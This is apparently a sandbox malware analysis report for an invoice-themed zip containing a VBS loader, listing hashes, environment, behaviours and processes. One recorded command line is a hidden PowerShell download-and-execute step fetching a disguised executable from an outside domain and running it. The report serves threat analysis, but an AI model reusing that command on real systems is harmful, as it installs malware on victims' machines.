General Info

File name

SignIQ Pty Ltd invoice 127.zip

Full analysis
https://app.any.run/tasks/b304f663-902a-4dfc-8b1b-de104af5bb5d
Verdict
Malicious activity
Analysis date
4/15/2019, 10:44:02
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

loader

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

1237ae60f76b5aecb8eb9fc55a858002

SHA1

3ce266baa2e645e85b01eb3cede10ffc4c15be84

SHA256

024b3cb1633de1603168d69af457ab313b56f9d609df46bed4389a74d243e907

SSDEEP

384:hryL7K2HYhSO4zre7SGTx7pv1MENKWfr+Lk3X8lfQc0yKj+pKZkJva:4L7bHYwO4wQq3TFlc+C0ZkY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
485 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (73.0.3683.86)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (14.12.25810.0)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810 (14.12.25810)
  • Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810 (14.12.25810)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
  • Mozilla Maintenance Service (65.0.2)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Changes settings of System certificates
  • dVjiJafHlc.exe (PID: 1628)
Application was dropped or rewritten from another process
  • dVjiJafHlc.exe (PID: 1628)
Reads the machine GUID from the registry
  • WinRAR.exe (PID: 2856)
  • WScript.exe (PID: 2384)
  • powershell.exe (PID: 2592)
Executes PowerShell scripts
  • WScript.exe (PID: 2384)
Creates files in the user directory
  • powershell.exe (PID: 2592)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 652)
  • iexplore.exe (PID: 908)
  • iexplore.exe (PID: 2488)
  • iexplore.exe (PID: 2728)
  • iexplore.exe (PID: 2136)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2752)
  • IEXPLORE.EXE (PID: 1904)
  • IEXPLORE.EXE (PID: 1892)
  • IEXPLORE.EXE (PID: 2800)
  • IEXPLORE.EXE (PID: 2912)
Reads settings of System Certificates
  • iexplore.exe (PID: 2136)
Changes internet zones settings
  • iexplore.exe (PID: 652)
  • iexplore.exe (PID: 2488)
  • iexplore.exe (PID: 908)
  • iexplore.exe (PID: 2728)
  • iexplore.exe (PID: 2136)
Reads Internet Cache Settings
  • iexplore.exe (PID: 2488)
  • iexplore.exe (PID: 652)
  • iexplore.exe (PID: 908)
  • iexplore.exe (PID: 2728)
  • iexplore.exe (PID: 2136)

Find more information about signature artifacts and mapping to the MITRE ATT&CK™ MATRIX in the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
null
ZipCompression:
Deflated
ZipModifyDate:
2019:04:15 00:29:05
ZipCRC:
0x98232722
ZipCompressedSize:
18326
ZipUncompressedSize:
69345
ZipFileName:
SignIQ Pty Ltd invoice 127.vbs

Video and screenshots

Processes

Total processes
50
Monitored processes
14
Malicious processes
0
Suspicious processes
1

Behavior graph

Process chain shown in the graph: winrar.exe → wscript.exe → powershell.exe → dvjijafhlc.exe, followed by several iexplore.exe instances ("no specs" marks processes for which no specifics were flagged).
Specs description
Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information


PID
2856
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules

PID
2384
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules

PID
2592
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -exec bypass -nop if($host.version.major -lt 3){Import-Module BitsTransfer} Start-BitsTransfer -Source https://saintsandsinnersbar.com/duplicate/answear.xls -Destination $env:temp\dVjiJafHlc.exe; Start-Process $env:temp\dVjiJafHlc.exe
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules

PID
1628
CMD
"C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe"
Path
C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
INCA Internet Co., Ltd.
Description
nProtect KeyCrypt Program Database DLL
Version
2003, 10, 1, 1
Modules
Image
c:\users\admin\appdata\local\temp\dvjijafhlc.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\lz32.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\winspool.drv
c:\windows\syswow64\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\clbcatq.dll
c:\windows\syswow64\wbem\wbemprox.dll
c:\windows\syswow64\wbemcomn.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\wbem\wbemsvc.dll
c:\windows\syswow64\wbem\fastprox.dll
c:\windows\syswow64\ntdsapi.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\gpapi.dll

PID
2136
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules

PID
2912
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2136 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules

PID
2728
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
2800
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2728 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

PID
908
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
2752
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:908 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
